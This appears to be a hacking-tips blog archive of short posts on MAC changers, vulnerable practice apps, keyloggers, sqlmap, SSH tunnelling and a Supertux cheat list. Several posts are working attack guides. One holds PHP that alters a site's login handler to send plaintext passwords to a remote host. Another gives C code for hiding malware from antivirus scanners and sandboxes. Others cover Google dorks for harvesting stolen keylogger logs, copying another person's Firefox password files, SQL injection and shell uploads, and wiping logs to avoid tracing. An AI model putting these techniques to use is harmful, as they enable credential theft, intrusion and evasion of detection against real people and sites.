Etherchange : Command Line Tool To Change MAC Address

I've already discussed on how to change mac adress of your ethernet card under windows as well as linux. One more such tool which is command line tool, is etherchange.

EtherChange can change the Ethernet address of the network adapters in Windows.

Usage instructions

Download the exe file and run it from a Command Prompt. It will give you the instructions you need. EtherChange only works if your account is in the Administrators group.

Download link: EtherChange

Read more...

Physical Memory Acquisition With MDD

MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.

This tool can be pretty useful to analyze the data present in RAM. Whenever we are running programs, RAM stores various range of information being used by the program. For example, if we are running a web browser, the RAM may contain the URLs being visited, form data, etc. So you can just guess we can extract a lot of information from RAM. Thus, MDD can be very useful tool to dump the physical memory into the file from which we can extract the required information.

You can read more and download the tool from MDD SourceForge Page.

Read more...

Reset Forgotten Ubuntu Password [How To]

If you've forgotten your ubuntu user password, it is still possible to recover the account by resetting the password. The recovery mode option in the grub menu can be used to reset the ubuntu user password as this mode lets us drop to the root shell prompt.

To reset the password, first select the recovery mode from grub menu. And then you'll have to select the "Drop to shell prompt" option. Now you can simply reset your password by using the passwd command.

passwd <yourusername>

Replace yourusername field with your username for ubuntu login and then you'll be prompted twice for new password. Enter the new password and you're done. Just reboot the system and this will successfully reset the password and you'll be able to access your ubuntu account. I hope this helps. :)

Read more...

Learn Web Hacking With WackoPicko

WackoPicko is a website that contains known vulnerabilities. It can prove as a very efficient way to master web hacking skills. This project is similar to Damn Vulnerable Web Application and is a collection of common web vulnerabilities.

For more information and downloads, you can check the WackoPicko github page.

Vulnerabilities

Reflected XSS
http://localhost/pictures/search.php?query=blah
The query parameter is vulnerable.

Stored XSS
http://localhost/guestbook.php
The comment field is vulnerable.

SessionID vulnerability
http://localhost/admin/login.php
The session cookie value is admin_session, which is an auto-incrementing value.

Stored SQL Injection
http://localhost/users/register.php -> http://localhost/users/similar.php
The first name field of the register users form contains a stored SQL injection which is then used unsanitized on the similar users page.

Reflected SQL Injection
http://localhost/users/login.php
The username field is vulnerable.

Directory Traversal
http://localhost/pictures/upload.php
The tag field has a directory traversal vulnerability enabling a malicious users to overwrite any file the web server uses has access to.

Multi-Step Stored XSS
http://localhost/pictures/view.php?picid=3
The comment field is vulnerable to XSS, however must go through a preview form.

Forceful Browsing
http://localhost/pictures/highquality.php?picid=3&key=highquality
The user doesn't have to purchase the picture to see the high quality version.

Command-line Injection
http://localhost/passcheck.php
The password field is vulnerable to a command line injections.

File Inclusion
http://localhost/admin/index.php?page=login
The page is vulnerable to a file inclusion vulnerability, however you have to include at the end.

Parameter Manipulation
http://localhost/users/sample.php?userid=1
The userid parameter can be manipulated to see any user's page when you need to be logged in otherwise.

Reflected XSS Behind JavaScript
http://localhost/piccheck.php
The name parameter is vulnerable.

Logic Flaw
http://localhost/cart/review.php
A coupon can be applied multiple times reducing the price of an order to zero. The coupon in the initial data is SUPERYOU21.

Reflected XSS Behind a Flash Form
http://localhost/submitname.php
The value parameter is vulnerable.

Weak username/password
https://localhost/admin/login.php
There is a default username/password combination of admin/admin.


Read more...

Keyloggers for Linux: Secretly Watch The Linux Users

For windows, there are numerous keyloggers out there with many pretty cool features but there has been none such great keylogger. But lately there have been few developments and new keyloggers have been developed for Linux platform. In this post, I'll list few keyloggers for linux I've heard about.

1. PyKeylogger - PyKeylogger is a free open source keylogger written in the python programming language, available under the terms of the GNU General Public License. It is currently available for Windows (NT/2000 and up), and Linux (using Xlib, so won't work on the console). It is primarily designed for personal backup purposes, rather than stealth keylogging. Thus, it does not make explicit attempts to hide its presence from the operating system or the user. That said, the only way it is visible is that the process name shows up in the task list, so it is not immediately apparent that there is a keylogger on the system. More on PyKeylogger

2. Logkeys - Logkeys is no more advanced than other available Linux keyloggers, but is a bit more up to date, it doesn't unreliably repeat keys and it should never crash your X. It works with serial as well as USB keyboards. More on Logkeys

3. LKL (Linux KeyLogger) - LKL is a userspace keylogger that runs under Linux on the x86 arch. LKL sniffs and logs everything that passes through the hardware keyboard port (0x60). It translates keycodes to ASCII with a keymap file. LKL Homepage

4. THC-Vlogger - THC-vlogger, an advanced linux kernel based keylogger developed by famous hacker group THC, enables the capability to log keystrokes of all administrator/user's sessions via console, serial and remote sessions (telnet, ssh), switching logging mode by using magic password, stealthily sending logged data to centralized remote server. Its smart mode can automatically detect password prompts to log only sensitive user and password information. THC-Vlogger Home

The keyloggers for Linux are not much advanced and generally lack stealth. You'll have to be creative to make those keyloggers really stealth. Anyway, I hope this list gives you a start to know about linux keyloggers.

Read more...

Automatic SQL Injection And Database Takeover With SQLMap 0.9

sqlmap is an open source SQL injection penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. SQLMap consists of a very accurate detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

SQLMap v. 0.9 is out on April 10, 2011 and now consists of more features than ever with numerous improvements in coding. This time the SQL Injection engine has been re-written in v. 0.9 and the tool will be very useful for security experts, enthusiasts and hackers. The feature list of SQLMap is available over HERE.

The tool can be downloaded from the sourceforge page HERE.

Read more...

A Very Basic Guide To SSH Tunnelling To Bypass Web Filters

SSh, Secure Shell, is a program and protocol for securely logging in to and running programs on remote machines across a network, with encryption to protect the transferred information and authentication to ensure that the remote machine is the one desired; To use ssh to connect to a remote computer. In this tutorial, I'll show you how to do simple ssh tunnelling to bypass web filters.

We'll be using a ssh client in this tutorial. One such SSh client is putty and we be using putty in our tutorial. It can be downloaded from HERE. We need a working SSh account and there are lots of free as well as paid free shell providers. I'll be using one of the shell accounts for this tutorial.

After downloading putty, open the program and enter the host and port information. The screenshot below will be helpful for you.

Now go to the SSh option below in the left menu of Putty. And select the tunnels submenu. Set the source port to any higher ports. I chose 8080 in my example. Then select the dynamic option. And click on Add by leaving other options as they are.

Now, click on Open and login to your SSh server. The only thing left now is to setup your favourite browser to work with the SSh tunnel. In firefox(under ubuntu), I go to Edit - Preferences - Advanced - Network - Settings to set the proper proxy configuration. The setup entry will be:

Socks host: localhost
Port: 8080

That's all for setup. Now you can use the ssh tunnel to browse webspace by bypassing web filters in your school or office. I hope it was useful. Thanks. :)

Read more...

How To Steal Various Keylogger's Log

Keylogger is a device or program that captures activities from an input device. Malicious people can make use of keyloggers to capture personal information being input into a computer system. Many of these keyloggers have the feature of uploading the log to some pre-defined(set by hackers) FTP servers. We can exploit this feature of keyloggers with the help of our Big Daddy, Google to obtain the logs of these keyloggers.

There are numerous keyloggers out there in the market and they provide this useful feature of FTP uploading of logs. But, the google is so powerful that it also indexes these log files. We can use the texts that are generally used by keyloggers to write in the text file. For example, following is the format of how iStealer, one of the widely used stealer, records the log through FTP.

Program: Firefox
Url/Host: http://www.google.com
Login: xxxxx
Password: xxxxx
Computer: samar-pc
Date: 2011-04-23 01:33:03
Ip: 116.90.*.*

So, we can use the terms such as Program, Url/Host, Login, etc. as the search keywords. The following search phrase would then reveal the iStealer's log.

Program: Url/Host: Login: Password: Computer: Date: Ip:

You can creatively specify the particular hosts or programs of which you want the login information. Moreover, you might also want to use the Date feature of advanced google search to find the latest results as they will have more likelyhood to work.

Another log format of some other keylogger is something like below so you can figure out the possible dork for this format.

APPLICATION : Firefox 4.0
URL : https://www.facebook.com
USERNAME : samar
PASSWORD : 144334@&%

You can actually experiment on your own to create new useful dorks. Many times, you will find good stuffs using these dorks. Just be creative with what you look for. I hope this guides you a little. :)


Read more...

Practise, Learn and Master Web Application Hacking With DVWA

DVWA, which stands for Damn Vulnerable Web Application, is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.


The DVWA v. 1.07 can be downloaded from HERE.

You will need to install Apache+PHP+MySQL environment(use LAMPP or XAMPP packages) to run and test this web application. This will definitely help you learn to spot web vulnerabilities of the varied levels. I hope this was useful. :)

Read more...

How To Steal Stored Passwords From Firefox

Many of us use the Firefox's built-in password manager to remember and store the password of the sites we login to frequently. While this can be very useful feature, it can be exploited by anyone with physical(or any other form of access to the filesystem) access to know the saved passwords of the user. In this post, I will discuss how you can view and save the stored passwords of your friends for future reference.

When we select "Remember Me" option to store passwords, the passwords are stored in two files.
1.key3.db
2. signons.sqlite

These two files are in the profile directory of the mozilla firefox application data for the respective user. Profile folders are placed in a common location by default but are named randomly for additional security (e.g., "xxxxxxxx.default" is the profile folder name for the "default" profile, where xxxxxxxx represents a random strung of characters). This directory is available at different places according to the distribution.

Under windows: %APPDATA%\Mozilla\Firefox\Profiles folder will list the profiles and you can open any of the profiles from there.

Under linux: ~/.mozilla/firefox/xxxxxxxx.default folder is the profile folder. So you can navigate to ~/.mozilla/firefox/ to view the profiles.

Under MAC: ~/Library/Mozilla/Firefox/Profiles/ or ~/Library/Application Support/Firefox/Profiles/ are the folders containing the profile directories.

You can follow any of the following two methods to view the stored passwords:

Method 1: In the target computer, go to Edit->Preferences->Security and click on Saved Passwords and then click on Show Passwords to view the login details of the victim in linux. In windows, you will have to go to Tools->Options->Security.

Method 2: The first method would be applicable only for viewing the login details in victim PC. Whenever you want to save these details for further reference, you will have to copy the previously mentioned two files and save to your USB drive(or maybe in mailbox). Now, all you have to do is copy these two files to the profile directory of your PC and then go to the menus mentioned in method #1.

I hope this was useful. Thanks. :)

Read more...

Web Application Attacking and Auditing with W3af Framework.

w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

W3af is the tool written totally in Python and supports many techniques for detecting and exploiting the web based vulnerabilities.
Framework features

w3af provides plugin writers with this features:
urllib2 wrapper
In order to send requests to the remote server w3af uses urllib2. The xUrllib module of w3af is a wrapper of urllib2 to make the plugin writer life easier, using this wrapper a plugin writer can forget about proxy's, proxy auth, basic/digest auth, etc. This is the complete list of features provided by xUrllib:

- Proxy
- Proxy auth ( basic and digest )
- Site auth ( basic and digest )
- Gracefully handle timeouts
- UserAgent faking
- Add custom headers to requests
- Cookie handling
- Local cache for GET and HEAD requests
- Local dns cache, this will speed up scannings. Only one request is made to the DNS server
- Keep-alive support fot http and https connections
- File upload using multipart POST requests
- SSL certificate support

Output Management
w3af provides plugin writers with an abstraction layer for data output using the Output Manager. The output manager can also be extended using plugins and can be used for writing results to a txt/html file or sending them over the network using scp, the options are endless. Available ouput plugins are:
- Console
- Text file

Web Service support
w3af knows how to parse WSDL files, and audit webservices. Plugin developers can write a simple plugin that will be able to find bugs in web services and also in common HTTP applications.

HTTP headers fuzzing
w3af supports finding bugs in HTTP headers with great ease!

IPC
IPC ( inter plugin communication :P) can easily be done using the knowledge base, another w3af feature thats really usefull for plugin developers.

Session saving
Framework parameters can be saved to a file using the sessionManager. After that, you can load the settings and start the same scan again without configuring all parameters.

Fuzzer
Right now w3af has a really simple fuzzer, but we have plans to extend it. Fuzzers are great, we know it.

HTML / WML parsing
w3af provides HTML / WML parsing features that are really easy to use.

To install w3af under your ubuntu, type the following in the terminal.

sudo apt-get install w3af


Visit w3af homepage



Read more...

How to steal password from login form

This article is written by neutralised of thesoftwareengineer.org but the domain has already expired so I thought to put this article here so that this small piece of information for beginner web hackers won't die.

-------------------------------------------------
[+] Login Form Password Stealing - Tutorial
[+] Author: Neutralise
[+] Location: http://thesoftwareengineer.org/services/tuts/LoginFormPassStealing.txt
--------------------------------------------------

Intro:
It seems that alot of people these days are gaining shell access, downloading a database then attempting to crack the hashes. If they are salted, sha1 or a hard to crack plain ole' MD5, they start bitchin and moaning when they can't get the plain text. So here it is, a tutorial on how to get user:pass format in plain text of ANY hash type.

Method:
Modify the login form of a site to catch the password remotely, before it is encrypted. I will explain this more simply via an example.
Take the following login form for example,

<form method="post" action="cookies.php">
<hr />
<p>
User: <input type="text" class="buttonstyle" name="username"></p>
<p>
Pass: <input type="password" class="buttonstyle" name="password"></p>
<p>
<input type="submit" value="Login" class="buttonstyle" name="submit"> 

<input type="reset" value="Reset" class="buttonstyle" /></p>
</form>

Now we can see that the action of this form points to 'cookies.php'. Now cookies.php will probably include a function similar to this depending on the encryption type, etc.

<?php
$user = $_POST['username'];
$pass = $_POST['password'];
if(md5($user) == $usermd5 && md5($pass) == $passmd5){
setcookie("Whatever", $cookie, time()+3600, "/");
header("Location: index.php");
die();
}
?>

Now on to bypassing the encryption before it happens, thus gaining the username and password in plain text we need to edit the 'cookie.php' site, add the following code at the start of the php tags.

<?php
$user = $_POST['username'];
$pass = $_POST['password'];
file_get_contents("http://site.com/plain.php?user=".$user."&pass=".$pass."");
?>>

Now the php file 'plain.php' will include the following code:

<?php
$user = $_GET['user'];
$pass = $_GET['pass'];
$file = "lol.txt";
$fp = fopen($file, "a");
fputs($fp, "$user:$pass\n");
fclose($fp);
?>>

Notice you will also need to upload a file 'lol.txt', and chmod it to 777.

Conclusion:
Now every time a user logs into the site you are editing the code of, it will send the username and password to the 'plain.php' text file and save it in 'log.txt', on a remoteserver in the format of:
user:pass

------------------------------
[+]^Neutralised.
------------------------------

Read more...

How to keep your crypter undetected or nearly FUD

This article is written by NoX of XR offensive security team and I found it to be rare and pretty interesting. I hope you will love this article.

In this I will show you how I kept my "Crypter" Fully UnDetected.

Alll source is in C/C++

So there are 3 main ways Anti Viruses will detect your software:

1: With a "signature" (some bytes/pattern of bytes in your binary)
2: Heuristics ("generic detection designed to detect new or previously unseen malware")
3: Running it in a VM (The anti virus will run your software in a fake environment and see what it does)

This is how i combated these...

1 - "signature"
This one is easy, just write your own code
(The whole point of a crypter is to hide a signature anyway)

2 - Heuristics
Ok the 2 types of things I found anti viruses picked up with heuristics was

A - Windows APIs
To combat this you can simple use the GetProcAddress() and GetModuleHandle() API
I found if you use it like this most anti viruses still detect it

GetProcAddress(GetModuleHandle("module name"), "method name");

But when I did it like these they would no longer detect it

char szModuleName[] = "module name";
char szMethodName[] = "method name";
GetProcAddress(GetModuleHandle(szModuleName), szMethodName);

This is a full example of using this technice to hide an API from a anti virus

typedef BOOL (WINAPI *__CreateProcess)
(
LPCTSTR lpApplicationName,
LPTSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCTSTR lpCurrentDirectory,
LPSTARTUPINFO lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);
const char szCreateProcessA[] = "CreateProcessA";
const char szKernel32[] = "kernel32.dll";
__CreateProcess _CreateProcess = (__CreateProcess)GetProcAddress(GetModuleHandle(sz Kernel32), szCreateProcessA);

Now u can replace all your calls of "CreateProcess()" with "_CreateProcess" =)
if u want to go over-kill u can also encrypt the string you use to load the function eg "CreateProcessA" and "kernel32.dll" when you define them as variables. then decrypt them before you call the GetProcAddress and GetModuleHandle... but I found this was not needed.

Also people say the methods and varible names should be something not sus, but I didn't find this as a problem.

B - Large RCDATA resources on the file
When I had a large RCDATA resource on the .exe anti viruses would flag it as a dropper. To fix this I simple split the rouses up into severale sperate resources less then 500kb each but 1000kb would probs be safe.
(I was using resources to store the crypted payload/exe in)

3 - Running it in a VM
There are lots of fancy ways to detect VMs them end your process early if you find that you are in one. But the VMs will update and your method will stop working and you wont be able to write code for every single VM

Common ways of detect VMs is to look up system variables that are known for the particular VM and then "return 0" if they are found.

I found a lot simpler way to bypass these VMs where to make them time out.
As a antivius software needs to be able to real time scan all .EXEs before you run then and not use much system resources to do this you can simple add a few seconds of useless code at the start of your software.

I used this

for ( int d = 0; d < 5000000; d++ )
{
int x = 1;
int y = x;
delete &x;
delete &y;
}

All this is a for loop that runs 5000000 and does some junk in it. It takes ~2 seconds to run and bypasses all known Antivirus VMs all the online multi scanners I have tried. What you do can be different and SHOULD be different as if every one used the same thing we would create a "signature". But basically a long loop that would take ~1-3 seconds should do. I personally think the delay of ~2 seconds is worth bypassing all the anti viruses ~50% of anivirus use a VM to detect malware these days... (I base this on nothing :)
Read more...

Backtrack 5 Release date announced

Backtrack Linux is the most widely used security pentesting distro and its now near to v. 5. The backtrack team has announced the release date of the BT5.

More INFO HERE

Read more...

How to get things for free in internet [Google dorks]

Well its been a few days I haven't posted. Today I have come with an interesting post that will help you get things for free in internet. Of course, it is not legal but it works in many cases but not always. And many of the results might be some craps.

Following are the list of the google dorks that will help you get some of the commercial softwares for free. Google dorks are the keyword phrases that can be searched with the google search engine.

intitle:"Thank You For Your Order" intext:Click Here to Download
intitle:"Thank You For Your Purchase" intext:Click Here to Download
inurl:/thankyou*.html intitle:Thank you for your order! intext:Click Here to Download
intitle:"Thank You For Your Order!" intext:download
inurl:thanks intext:"Thank You For Your Order!" "Click Here" filetype:html

The above dorks are just the examples. You can modify them and do some experiments on your own to search for specific domains, etc. I hope this is useful. Thanks :)

Read more...

Art of hacking 2 - spyd3rm4n's guide to hacking

Earlier I posted the spyd3rm4n's guide to hacking part 1 over HERE. This is the 2nd part of the guide. Enjoy the guide.

Part II

[0x01] Common_Knowledge
[0x02] How


Sub Common_Knowledge{
It is customary that a hacker know how to hack, but it is mandatory that a hacker know how to hide his/her ass.

You DO NOT want to get caught because:
A) I'm sure you don't want to pay that hefty fine.
B) I'm positive you don't want a criminal record.
C) You probably don't want to be put on probation.
D) You put everybody you have contacted on the internet within your past at risk of being caught.
E) You WILL be frowned upon as a terrible hacker. Everyone knows, you're dumb as shit if you get caught.
F) If you find any reasons why getting caught would be a good idea, please consider the following:
Go to the local gunshop.
Purchase a powerful weapon (remember, you don't want to screw this up.)
Purchase a small magazine.
Go home, place the clip into the weapon, take off the saftey and look into the barrel of the gun and email me back
the color that flashes inside the barrel when the trigger is pulled.
}

Sub How{
What are some ways you can hide your ass? Well, good question, but there are many answers.

I have to say, that the most common way for a person to hide their e-dentity is via a proxy.
Now, one problem with the proxies, is that anyone with common sense can find out your real IP. This is the start of Forensics.
The easiest way for a person to find your IP is the find the provider of the proxy, most like CDN (CoDeeN), seeing that they are
the largest proxy releasing company on the inet. Once they contact CoDeeN (who keep records of all IP's logged into their proxy
at all times), they can find your IP and with a simple whois, can come up with the location of you or your ISP. After that, it's just
a long talk between you and your ISP to find out your information. That's if there has been illegal activity and/or you caused some 
pretty hefty damage. ISP's can't release a persons information without a court order as that is an invasion of privacy. But there are
some loop holes in this system. I'm sure you have all read your ISP's fine print and Terms of Service correct? Well, it will most likely
contain something stating that hacking is illegal and that if caught, they can and will report you to the authorities etc.
Another reason is because of the easy PHP function, $_SERVER['HTTP_X_FORWARDED_FOR'] which can be used to grab your real
IP and/or block your attempt at viewing the site.

Another way of hiding your ass, which I suggest as a first part, because it is the easiest, is find a VPN. VPN stands for Virtual Private
Network. Large companies/businesses have these VPN's for their employees to operate on a local network (LAN) over WAN (Wide
Area Network). They will mask your IP with the IP that the VPN is setup on. I.E. My IP is 66.77.88.102 and the VPN IP is 24.12.21.64,
when I log into the VPN, my IP will become 24.12.21.64. This covers your IP over every protocol, it whoops Socks 4 and Socks 5 proxies
rearends. The one thing you have to worry about with a VPN, is that they too, if setup correctly, can log every IP that has used the VPN
at anytime of the day.

Now that the 2 most common ways of hiding your ip have been discussed. Let's not rule out some of the other ways. One being VNC tunneling.
This is the process of logging in to a remote administrative tool repeatedly on other servers.
Example:
Server 1 IP: 1.2.3.4
Server 2 IP: 1.2.3.5
Server 3 IP: 1.2.3.6

All servers have VNC running. I will then log into the VNC for Server 1, then I will use Server 1's VNC to log into Server 2, and repeat the process until
I am logged in on Server 3. This will hide my IP 3 times and make tracing it back even harder. But, once again, you've guessed it. It records everything.

Well, Since I'm getting pretty desperate here, why don't I go balls out?

I will hop on a VPN, then I will VNC tunnel into about 2 or 3 Servers, while logging into a VPN on each of those, then, finally, when I'm tunneled into
Server 3, I will put a VPN on, log into a Socks 4 proxy, put on a anonymous proxy, if I have to, even goto a well known web proxifying site that runs
a CGI or PHP built proxy to view the content needed. Now, picture yourself as that person who has to find your real IP. Yeah, it's gonna be a blast.
The only bad part about this is the fact that the more you log into, the slower and slower it will get. Best done on a high-speed line.

Finally, since this is a mini-book on hiding your ass, I might as well tell you that everything of anything on the internet is logged. Don't forget to clear them.
Example: SSH-
don't forget to rm -rf /var/logs*
}

- Credits : Kr3w of TheDefaced.

Read more...

Art of hacking 1 - spyd3rm4n's guide to hacking

This series of articles can be very useful for many beginners out there but after the thedefaced and darkmindz went down, I haven't really seen these articles anywhere else. So I thought to share this article over here. Its NOT written by me and I would like to provide the full credit to the original author as well.


Art of hacking [ 1 ] 

spyd3rm4n's guide to hacking

Part I

[0x01] Definition
[0x02] Method
[0x03] Side_Notes
[0x04] Credits

Sub Definition{
a : to write computer programs for enjoyment
b : to gain access to a computer illegally
}

Sub Method{
These are the boundaries that differentiate a hacker, from a cracker. A cracker will use the same methods of a hacker, but instead of leaving it at just that, they will take it one step beyond, and use the information gained to extort another person and/or cause damage.

Now that has been cleared up, I will just inform you of one of my most common method of hacking.

When I hack, it is a golden rule that I must know what I am hacking. If it's a website, I must know what language is it written in. If I do not, I will learn the language, or at least be able to read it and pick out human errors in the programming.

I usually start like this:
I will first search the website for vulnerable user-input fields. Something that interacts with the viewer. It should include fields that are POST and GET. I will test these fields for penetration. The most common fields vulnerable, are search forms. These can be vulnerable to almost any type of injection, HTML, JAVASCRIPT, or SQL. To test if a field is injectable with HTML, I will usually type "<h1>hello</h1>." If the page returns the word hello in big bold letters, I know it's vulnerable. I then will step it up to JAVASCRIPT. I will type "<script>alert(1)</script>", <script language="Javascript">alert(1)</script>m etc.." If the returned page contains an alert message printing the number 1, I know I can cross-site script it (XSS). SQL on the other hand has a number of pen-testing syntaxes. I usually type a single quote, if it returns SQL errors, I know its vulnerable to injection. If it doesn't, I will sometimes try different combinations of SQL attacks. I will try most commonly, and my favorite, a union injection. Syntax: '+union+select+1-- 
If that returns with any sort of SQL error, I then know I hit the jackpot. The most common error with union selections is "The UNION SELECT statement is missing the correct number of columns" or something of that sort. It means that you have to select more than one column. This can be the longest part of injecting. You then have to '+union+select+1,2-- each time, adding on another number separated by a comma until your UNION SELECT statement has no errors, and returns a value from that field. I will then look for the returned page for a number. If for example, lets say I did '+union+select+1,2,3,4,5,6--
and the page returns a series of pictures, and in the blue, there is just the number 6 on that page, I will then do '+union+select+1,2,3,4,5,table_name+from+information_schema.tables--
This will select the table name from the information schema, if its allowed. That's all I'm going to say about that for now. If you want to know more, you can learn up on your SQL.

Next, if I find the site is pretty secure, it is always important not to rule out other methods of intrusion. My 2nd and favorite method, is the capturing of the host. With a simple WHOIS lookup, I can find the host of their site. Now, if I pen-test their host and find a vulnerability, that is just as good as hacking their site because it allows for a way in. If all else fails, you can do a reverse IP lookup on the domain of the website. Take a look at all the other websites on that IP and pen-test their security. If you can get rights to upload on one of their sites, you can upload a PHP-Shell and work your way into their directory, viewing their files. If you want to take it further, you can go ahead and try to root the server. Rooting is pretty easy if you know what you're looking for/know any stack/buffer overflows for the OS. Most servers run linux, so it's best to look for overflows for that specific kernel version that contain "Local Root" in it. Other than that, there are so many ways of obtaining root. These include but are not limited to key-logging, phishing, and social engineering. That's pretty much the basis of one of my most common methods of hacking. If you would like to know more, well.. I'm sorry, but you're going to have to pick up the knowledge as you continue your career hacking.
}

Sub Side_Notes{
If you want to learn more, you can check out the mini-books on Hide My Ass, XSS Injection, SQL Injection, Navigating towards root in a PHP Shell, and Stack Overflows in a nuttshell.
}

Sub Credits{
I'm sure you're all wondering who I am going to credit in this. The thing is that over the years, I have encountered many talented hackers. Too many to name in fact. But, there is one person I have to give credit to for being probably one of the most talented hackers I have "read" from. This person is unknown, and I'm sure many of you have read some of their docs. This person is the author of the ZFO (Zero For Owned) series. If you haven't read them, I highly suggest you do a google dork for Zeroforowned. Not to sure on how many of them are still public/around. (You'll notice the style of documentation similarity that I have put in this document, with the ZFO).
}

- Credits : Kr3w of TheDefaced 

Read more...

Supertux2 console scripting hacks/tricks

SuperTux is a classic 2D jump and run sidescroller game in a similar style like the original SuperMario games. It is similar to mario with its hero as the Tux, the official mascot of the linux kernel. Well there are few interesting tricks that can be used in the console mode of this game so enjoy this post.

For the cheats to work, you need to enable the console mode either by editing the config file situated at $HOME/.supertux2/ or by running the supertux2 with the --console argument. IInd way is easier.
So we first need to start the program by typing in the Run command[Alt+F2]

supertux2 --console

Now console mode can be toggled by using a specific keyboard input which is ^ by default and can be modified from the options menu. I prefer ` as the console key.

Now while playing the game, we will press the console key and then a new overlapping console will be seen. There we will be typing the commands which will be listed in this post.

There are different kinds of functions that can be enlisted by pressing Tab when console screen is on.

Following are few interesting global functions that can be called by typing as they are below:

play_music(string musicfile) Changes music to musicfile

play_sound(string soundfile) Plays a soundfile

grease() Speeds Tux's horizontal velocity by a factor of 3.

ghost() Makes Tux a ghost, letting him float around and through objects.

invincible() Make Tux invincible for 10000 units of game time.

mortal() Recall Tux's invincibility or ghost status. (Even when not given with above 2 commands)

restart() Reinitialize and respawn Tux at the beginning of the current level.

whereami() Print out Tux's coordinates to the console.

gotoend() Moves Tux horizontally 2 screens away from the end.

camera() Display the current camera's coordinates. (top-left corner)

quit() Exits the game. (Not recommended for use in levels!)

Apart from these global ones, we can access the other objects such as Tux(object of Player class), Camera, etc. In the following list of Player class's function, you can access each of them by typing sector.Tux.function_name(). For example, to call do_cheer(), you would type sector.Tux.do_cheer() in the console.

add_bonus(string bonusname) Gives Tux the specified bonus. Replace bonusname with either of "grow", "fireflower" or "iceflower".

add_coins(int number) Gives Tux number coins.

make_invincible() Makes the player invincible for either a predefined amount of time.

deactivate() Stops the player and blocks the movement controls.

activate() Reactivates the player's movement controls.

walk(float speed) Make Tux walk

set_visible(bool visible) Shows or hides Tux according to the value of visible. Note: Tux doesn't interact with objects or badguys while invisible.

get_visible() Returns: bool; is Tux visible?

kill(bool completely) Hurts a player, if completely=true then the player will be killed even if he had grow or fireflower bonus.

set_ghost_mode(bool enable) Switches ghost mode on/off.
Lets Tux float around and through solid objects.

get_ghost_mode() Returns whether ghost mode is currently enabled

do_cheer() Makes Tux cheer, if possible.

do_duck() Makes Tux duck, if possible.

do_standup() Makes Tux stand up, if possible.

do_backflip() Makes Tux backflip, if possible.

do_jump() Makes Tux jump, if possible.

For more scripting reference, please visit this link.

Happy Supertuxing :-)

Read more...

Paros Proxy - A tool for security pentester

Paros proxy can be used as the security pentest tool for evaluating the security of the web application. Written in JAVA, this tool can be used to intercept and modify all HTTP and HTTPS data between server and client, including cookies and form fields. Moreover this tool comes with an inbuilt session ID analyzer and fuzzing tool too.


For more information and downloads, you can visit the Official Site.

Thanks. :)

Read more...

Multiple accounts with single email account in forums/facebook and other sites

Hi everybody, its been a long time. I was in vacation and tour and was completely away from internet for a while. I will now start to post more regularly. Anyway in this post, I will show you how you can make multiple accounts in different discussion forums, social networking sites and other different sites (and even maybe in IRCs and others) with the single email account. This trick requires a single gmail account.

I accidentally mistyped the extra dot in my gmail account while registering in one forum. But in around a minute, my gmail tab was showing 1 new message in inbox and when I checked it, it was the forum's registration message. Then I tried to find what was going on and even a quick google search revealed that this would actually work.
So the idea is just registering in your target site with multiple forms of your gmail account with dot (.) in different positions. This google answer provides the answer for this so the account coolsamar207@gmail.com would be equivalent to:
cool.samar207@gmail.com
or
coolsamar.207@gmail.com
or
coOlsamar2.07@gmail.com
etc.

This means you can register in the forums/sites with any of the above(and much more) gmail accounts and still the email confirmation would come to your email account. I mean each accounts in the site would be actually associated with the single gmail account.

I tested this with fluxbb and facebook and was working well. I guess it would work for other social networking sites like myspace, twitter, etc. This might come handy for many of you guys for different purposes. If you got any queries, feel free to ask here.

Read more...